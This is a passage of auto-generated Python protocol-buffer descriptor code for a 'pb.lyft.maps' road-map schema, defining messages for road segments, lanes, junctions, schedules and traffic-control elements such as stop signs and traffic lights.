name='timezone_database_region_name', full_name='pb.lyft.maps.DailyTimeInterval.timezone_database_region_name', index=3,
number=4, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
_DAILYTIMEINTERVAL_DAYOFTHEWEEK,
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=687,
serialized_end=990,
)
_SCHEDULE = _descriptor.Descriptor(
name='Schedule',
full_name='pb.lyft.maps.Schedule',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='daily_schedule', full_name='pb.lyft.maps.Schedule.daily_schedule', index=0,
number=1, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=992,
serialized_end=1059,
)
_CONDITION = _descriptor.Descriptor(
name='Condition',
full_name='pb.lyft.maps.Condition',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='daily_temporal_condition', full_name='pb.lyft.maps.Condition.daily_temporal_condition', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
_descriptor.OneofDescriptor(
name='condition', full_name='pb.lyft.maps.Condition.condition',
index=0, containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[]),
],
serialized_start=1061,
serialized_end=1154,
)
_ROADNETWORKSEGMENT_LANESET = _descriptor.Descriptor(
name='LaneSet',
full_name='pb.lyft.maps.RoadNetworkSegment.LaneSet',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='num_driving_lanes', full_name='pb.lyft.maps.RoadNetworkSegment.LaneSet.num_driving_lanes', index=0,
number=1, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='num_left_turn_driving_lanes', full_name='pb.lyft.maps.RoadNetworkSegment.LaneSet.num_left_turn_driving_lanes', index=1,
number=2, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='num_right_turn_driving_lanes', full_name='pb.lyft.maps.RoadNetworkSegment.LaneSet.num_right_turn_driving_lanes', index=2,
number=3, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='turn_descriptions_for_driving_lanes', full_name='pb.lyft.maps.RoadNetworkSegment.LaneSet.turn_descriptions_for_driving_lanes', index=3,
number=4, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='bike_lane_access', full_name='pb.lyft.maps.RoadNetworkSegment.LaneSet.bike_lane_access', index=4,
number=16, type=14, cpp_type=8, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
_ROADNETWORKSEGMENT_LANESET_BIKELANEACCESS,
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=2135,
serialized_end=2502,
)
_ROADNETWORKSEGMENT = _descriptor.Descriptor(
name='RoadNetworkSegment',
full_name='pb.lyft.maps.RoadNetworkSegment',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='vertices', full_name='pb.lyft.maps.RoadNetworkSegment.vertices', index=0,
number=1, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='start_node', full_name='pb.lyft.maps.RoadNetworkSegment.start_node', index=1,
number=2, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='end_node', full_name='pb.lyft.maps.RoadNetworkSegment.end_node', index=2,
number=3, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='forward_lane_set', full_name='pb.lyft.maps.RoadNetworkSegment.forward_lane_set', index=3,
number=4, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='backward_lane_set', full_name='pb.lyft.maps.RoadNetworkSegment.backward_lane_set', index=4,
number=13, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='num_bidirectional_lanes', full_name='pb.lyft.maps.RoadNetworkSegment.num_bidirectional_lanes', index=5,
number=15, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='lanes', full_name='pb.lyft.maps.RoadNetworkSegment.lanes', index=6,
number=12, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='name', full_name='pb.lyft.maps.RoadNetworkSegment.name', index=7,
number=5, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='road_class', full_name='pb.lyft.maps.RoadNetworkSegment.road_class', index=8,
number=6, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='is_private', full_name='pb.lyft.maps.RoadNetworkSegment.is_private', index=9,
number=14, type=8, cpp_type=7, label=1,
has_default_value=False, default_value=False,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='is_toll_road', full_name='pb.lyft.maps.RoadNetworkSegment.is_toll_road', index=10,
number=17, type=8, cpp_type=7, label=1,
has_default_value=False, default_value=False,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='travel_direction', full_name='pb.lyft.maps.RoadNetworkSegment.travel_direction', index=11,
number=7, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='z_level', full_name='pb.lyft.maps.RoadNetworkSegment.z_level', index=12,
number=8, type=17, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='speed_limit_meters_per_second', full_name='pb.lyft.maps.RoadNetworkSegment.speed_limit_meters_per_second', index=13,
number=9, type=2, cpp_type=6, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='backward_direction_speed_limit_meters_per_second', full_name='pb.lyft.maps.RoadNetworkSegment.backward_direction_speed_limit_meters_per_second', index=14,
number=10, type=2, cpp_type=6, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='restrictions', full_name='pb.lyft.maps.RoadNetworkSegment.restrictions', index=15,
number=11, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='driveable', full_name='pb.lyft.maps.RoadNetworkSegment.driveable', index=16,
number=20, type=8, cpp_type=7, label=1,
has_default_value=False, default_value=False,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='walkable', full_name='pb.lyft.maps.RoadNetworkSegment.walkable', index=17,
number=21, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='forward_bikeable', full_name='pb.lyft.maps.RoadNetworkSegment.forward_bikeable', index=18,
number=23, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='backward_bikeable', full_name='pb.lyft.maps.RoadNetworkSegment.backward_bikeable', index=19,
number=24, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[_ROADNETWORKSEGMENT_LANESET, ],
enum_types=[
_ROADNETWORKSEGMENT_ROADCLASS,
_ROADNETWORKSEGMENT_TRAVELDIRECTION,
_ROADNETWORKSEGMENT_SIDEOFSEGMENT,
_ROADNETWORKSEGMENT_BIKEACCESS,
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=1157,
serialized_end=3325,
)
_JUNCTION = _descriptor.Descriptor(
name='Junction',
full_name='pb.lyft.maps.Junction',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='is_non_trivial_intersection', full_name='pb.lyft.maps.Junction.is_non_trivial_intersection', index=0,
number=4, type=8, cpp_type=7, label=1,
has_default_value=False, default_value=False,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='road_network_nodes', full_name='pb.lyft.maps.Junction.road_network_nodes', index=1,
number=1, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='lanes', full_name='pb.lyft.maps.Junction.lanes', index=2,
number=3, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='traffic_control_elements', full_name='pb.lyft.maps.Junction.traffic_control_elements', index=3,
number=2, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=3328,
serialized_end=3524,
)
_LANE_BOUNDARY = _descriptor.Descriptor(
name='Boundary',
full_name='pb.lyft.maps.Lane.Boundary',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='vertex_deltas_x_cm', full_name='pb.lyft.maps.Lane.Boundary.vertex_deltas_x_cm', index=0,
number=1, type=17, cpp_type=1, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='vertex_deltas_y_cm', full_name='pb.lyft.maps.Lane.Boundary.vertex_deltas_y_cm', index=1,
number=2, type=17, cpp_type=1, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='vertex_deltas_z_cm', full_name='pb.lyft.maps.Lane.Boundary.vertex_deltas_z_cm', index=2,
number=3, type=17, cpp_type=1, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='divider_type', full_name='pb.lyft.maps.Lane.Boundary.divider_type', index=3,
number=4, type=14, cpp_type=8, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='type_change_point_cm', full_name='pb.lyft.maps.Lane.Boundary.type_change_point_cm', index=4,
number=5, type=5, cpp_type=1, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
_LANE_BOUNDARY_DIVIDERTYPE,
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=4292,
serialized_end=4790,
)
_LANE = _descriptor.Descriptor(
name='Lane',
full_name='pb.lyft.maps.Lane',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='parent_segment_or_junction', full_name='pb.lyft.maps.Lane.parent_segment_or_junction', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='access_restriction', full_name='pb.lyft.maps.Lane.access_restriction', index=1,
number=11, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='orientation_in_parent_segment', full_name='pb.lyft.maps.Lane.orientation_in_parent_segment', index=2,
number=12, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='turn_type_in_parent_junction', full_name='pb.lyft.maps.Lane.turn_type_in_parent_junction', index=3,
number=13, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='geo_frame', full_name='pb.lyft.maps.Lane.geo_frame', index=4,
number=2, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='left_boundary', full_name='pb.lyft.maps.Lane.left_boundary', index=5,
number=3, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='right_boundary', full_name='pb.lyft.maps.Lane.right_boundary', index=6,
number=4, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='lanes_ahead', full_name='pb.lyft.maps.Lane.lanes_ahead', index=7,
number=5, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='adjacent_lane_change_left', full_name='pb.lyft.maps.Lane.adjacent_lane_change_left', index=8,
number=6, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='adjacent_lane_change_right', full_name='pb.lyft.maps.Lane.adjacent_lane_change_right', index=9,
number=7, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='traffic_controls', full_name='pb.lyft.maps.Lane.traffic_controls', index=10,
number=8, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='yield_to_lanes', full_name='pb.lyft.maps.Lane.yield_to_lanes', index=11,
number=9, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='can_have_parked_cars', full_name='pb.lyft.maps.Lane.can_have_parked_cars', index=12,
number=10, type=8, cpp_type=7, label=1,
has_default_value=False, default_value=False,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='tolls', full_name='pb.lyft.maps.Lane.tolls', index=13,
number=14, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[_LANE_BOUNDARY, ],
enum_types=[
_LANE_TURNTYPE,
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=3527,
serialized_end=4894,
)
_TRAFFICCONTROLELEMENT_PEDESTRIANCROSSWALK = _descriptor.Descriptor(
name='PedestrianCrosswalk',
full_name='pb.lyft.maps.TrafficControlElement.PedestrianCrosswalk',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='traffic_lights', full_name='pb.lyft.maps.TrafficControlElement.PedestrianCrosswalk.traffic_lights', index=0,
number=1, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='yield_lines', full_name='pb.lyft.maps.TrafficControlElement.PedestrianCrosswalk.yield_lines', index=1,
number=2, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=9669,
serialized_end=9783,
)
_TRAFFICCONTROLELEMENT_AUXILIARYELEMENT = _descriptor.Descriptor(
name='AuxiliaryElement',
full_name='pb.lyft.maps.TrafficControlElement.AuxiliaryElement',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='primary_traffic_control_elements', full_name='pb.lyft.maps.TrafficControlElement.AuxiliaryElement.primary_traffic_control_elements', index=0,
number=1, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=9785,
serialized_end=9869,
)
_TRAFFICCONTROLELEMENT_TRAFFICLIGHTFACESTATE_YIELDSET = _descriptor.Descriptor(
name='YieldSet',
full_name='pb.lyft.maps.TrafficControlElement.TrafficLightFaceState.YieldSet',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='lane', full_name='pb.lyft.maps.TrafficControlElement.TrafficLightFaceState.YieldSet.lane', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='yield_to_lanes', full_name='pb.lyft.maps.TrafficControlElement.TrafficLightFaceState.YieldSet.yield_to_lanes', index=1,
number=2, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='yield_to_crosswalks', full_name='pb.lyft.maps.TrafficControlElement.TrafficLightFaceState.YieldSet.yield_to_crosswalks', index=2,
number=3, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=10025,
serialized_end=10174,
)
_TRAFFICCONTROLELEMENT_TRAFFICLIGHTFACESTATE = _descriptor.Descriptor(
name='TrafficLightFaceState',
full_name='pb.lyft.maps.TrafficControlElement.TrafficLightFaceState',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='yield_rules_when_on', full_name='pb.lyft.maps.TrafficControlElement.TrafficLightFaceState.yield_rules_when_on', index=0,
number=1, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='no_right_turn_on_red', full_name='pb.lyft.maps.TrafficControlElement.TrafficLightFaceState.no_right_turn_on_red', index=1,
number=2, type=8, cpp_type=7, label=1,
has_default_value=False, default_value=False,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[_TRAFFICCONTROLELEMENT_TRAFFICLIGHTFACESTATE_YIELDSET, ],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=9872,
serialized_end=10174,
)
_TRAFFICCONTROLELEMENT_TRAFFICLIGHT = _descriptor.Descriptor(
name='TrafficLight',
full_name='pb.lyft.maps.TrafficControlElement.TrafficLight',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='face_states', full_name='pb.lyft.maps.TrafficControlElement.TrafficLight.face_states', index=0,
number=3, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=10176,
serialized_end=10235,
)
_TRAFFICCONTROLELEMENT = _descriptor.Descriptor(
name='TrafficControlElement',
full_name='pb.lyft.maps.TrafficControlElement',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='stop_sign', full_name='pb.lyft.maps.TrafficControlElement.stop_sign', index=0,
number=7, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='yield_sign', full_name='pb.lyft.maps.TrafficControlElement.yield_sign', index=1,
number=8, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='stop_line', full_name='pb.lyft.maps.TrafficControlElement.stop_line', index=2,
number=47, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='traffic_light', full_name='pb.lyft.maps.TrafficControlElement.traffic_light', index=3,
number=29, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='signal_flashing_yellow', full_name='pb.lyft.maps.TrafficControlElement.signal_flashing_yellow', index=4,
number=9, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='signal_flashing_red', full_name='pb.lyft.maps.TrafficControlElement.signal_flashing_red', index=5,
number=10, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='signal_red_face', full_name='pb.lyft.maps.TrafficControlElement.signal_red_face', index=6,
number=11, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='signal_yellow_face', full_name='pb.lyft.maps.TrafficControlElement.signal_yellow_face', index=7,
number=12, type=11, cpp_type=10, label=1,
